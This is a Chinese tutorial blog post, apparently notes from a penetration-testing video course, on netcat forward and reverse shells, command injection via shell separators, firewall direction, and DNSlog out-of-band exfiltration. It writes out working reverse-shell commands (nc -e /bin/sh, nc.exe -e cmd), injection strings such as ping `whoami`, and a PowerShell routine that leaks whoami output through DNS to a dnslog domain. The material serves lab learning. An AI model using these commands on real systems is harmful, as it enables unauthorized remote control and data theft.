当前位置: 首页 > news >正文

安全学习基础入门5集

前言:

来源于b站小迪安全v2023第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载_哔哩哔哩_bilibili

环境准备:

通过网盘分享的文件:netcat-1.11
链接: https://pan.baidu.com/s/1zgyYvPfbCvfQxoE6aouewA?pwd=hhrb 提取码: hhrb 

第五集内容:

重点是文件下载、无图形化的解决方法,资源网站:棱角社区

文件下载命令

        windows系统

        powershell、certutil、Bitsadmin、msiexec

        linux系统

        wget、curl、python、ruby、perl、java

反弹shell操作

原理:主要用于获取权限后,但是服务器没有交互、回显的情况,解决数据通讯

环境准备:一台linux(192.168.150.170),一台windows系统,装好了nc.exe(192.168.150.78),为内网和内网之间的测试

外网主机:152.12.31.251

正向连接

linux控制windows (linux主动去连接windows服务器)连接对方的ip,就是主动

         linux:nc 192.168.150.78 9090

         windows:nc.exe -e cmd -lvvp 9090

windows控制linux

        windows:nc.exe 192.168.150.170 9090

        linux:nc -e /bin/sh -lvvp 9090

反向连接

linux被windows控制(linux被连接)

        linux:nc -e /bin/sh 192.168.160.78 9090

        windows:nc.exe -lvvp 

windows被linux控制(windows被连接)

        windows:nc.exe -e cmd 192.168.150.170 9090

        linux:nc -lvvp 9090

内网和外网之间的测试,

外网用户控制内网只能用反向连接,外网不能用nc 192.168.150.78 9090

        外网:nc -lvvp 9090

        内网:nc.exe -e cmd 152.12.31.251 5566  

内网控制外网

        正向连接

        外网:nc -e /bin/sh -lvvp 9090

        内网:nc.exe 152.12.31.251 9090

        反向连接

        外网:nc -e /bin/sh 192.168.150.78   这种不行,也就是说

总结内网和外网之间的测试:内网控制外网只能用正向连接,外网控制内网只能用反向连接

管道符:|(管道符号,依次执行命令) ||(逻辑或,前一条命令执行错误,执行后一条) &&(逻辑与,两条命令都正确,才执行) &(后台任务符号,在windows是连接符号,在linux是会一直执行&前面的命令,除非用ps看进程,然后kill杀掉)

windows:|   &   ||   &&

linux:;   ||   &   &&   ``(特有 `` 和; )

两条命令都执行

ping 127.0.0.1 | whoami

ping 127.0.0.1 || whoami (前面为真,不执行后面的)

ping 127.0.0.1 && whoami

ping -c 1 127.0.0.1 & whoami

ping -c 1 127.0.0.1  `whoami`

ping  `whoami`

防火墙策略

入站限制9090,出站宽松

        主动给出去,外面的监听就好了,相当于上面的外网控制内网的一样

如果设置了出站的限制了,但是入站如果没有设置放行,默认也是不能运行任何流量进入的

        相当于是入站严格,出站宽松的原理(我们设置了出站严格,那么本身入站也是严格的)

有漏洞,但是没有回显(前面的是)

利用dnslog进行带外操作

        利用ping带外的地址(dnslog),然后dnslog就会返回那个ip地址,顺便把命令执行了

        linux可以执行,ping `whoami`+带外ip,就会执行whoami的结果,顺便将结果带回来了,带          给了dnslog

        windows不可以执行  ``,但是windows里cmd的powershell可以赋值变量,然后可以间接的将          结果带出来

windows的带外操作(因为不能直接在cmd命令行上使用,所以要切换powershell版)

win+r打开命令行,使用命令:powershell,切换

        $a = whoami

        $b = '.ubt2xs.dnslog.cn'

        $c = $a + $b;

        $x = $c.replace('\','xxxx');

        ping $x;

linux版(就用``就可以外带了,因为linux支持``)

ping `whoami`+.外带地址

        例如:ping `whoami`.caiuz4.dnslog.cn

由于我服务器ping了没反应,不知道是不是只能国内的服务器ping?有点奇怪,但理论是没有问题的

相关文章:

  • 9. 深入Spring AI:刨析 ChatMemory
  • LeetCode 150题解 | 逆波兰表达式求值
  • WPF使用依赖注入框架AutoMapper
  • 第T10周:数据增强
  • 【MySQL】复合查询与内外连接
  • 日语学习-日语知识点小记-构建基础-JLPT-N4阶段(13): ておきます ています & てあります
  • OpenGL-ES 学习(15) ----纹理
  • 【Unity】 组件库分类详解
  • 【计算机视觉】语义分割:MMSegmentation:OpenMMLab开源语义分割框架实战指南
  • OpenGL-ES 学习(12) ---- VBO EBO VAO
  • 动态规划引入
  • 【Dify系列教程重置精品版】第五章:Dify配置Ollama
  • C# System.Text.Json终极指南(十):从基础到高性能序列化实战
  • MCP 多工具协作链路设计:打造真正的智能工作流
  • 补题:K - Magic Tree (Gym - 105231K)
  • SpringBoot研究生双选系统开发实现
  • Rust中避免过度使用锁导致性能问题的策略
  • C# | 基于C#实现的BDS NMEA-0183数据解析上位机
  • 详解TypeScript中的类型断言及其绕过类型检查机制
  • Python 从入门到精通3 控制结构
  • 龙翔被撤销南京市人大常委会主任职务,此前已被查
  • 当农民跨进流动的世界|劳动者的书信①
  • 航海王亚洲巡展、工厂店直销……上海多区推出“五五购物节”活动
  • 厚重与潮流交织,淮安展现“运河之都”全新城市想象
  • 初步结果显示加拿大自由党赢得大选,外交部回应
  • 龚正会见委内瑞拉副总统罗德里格斯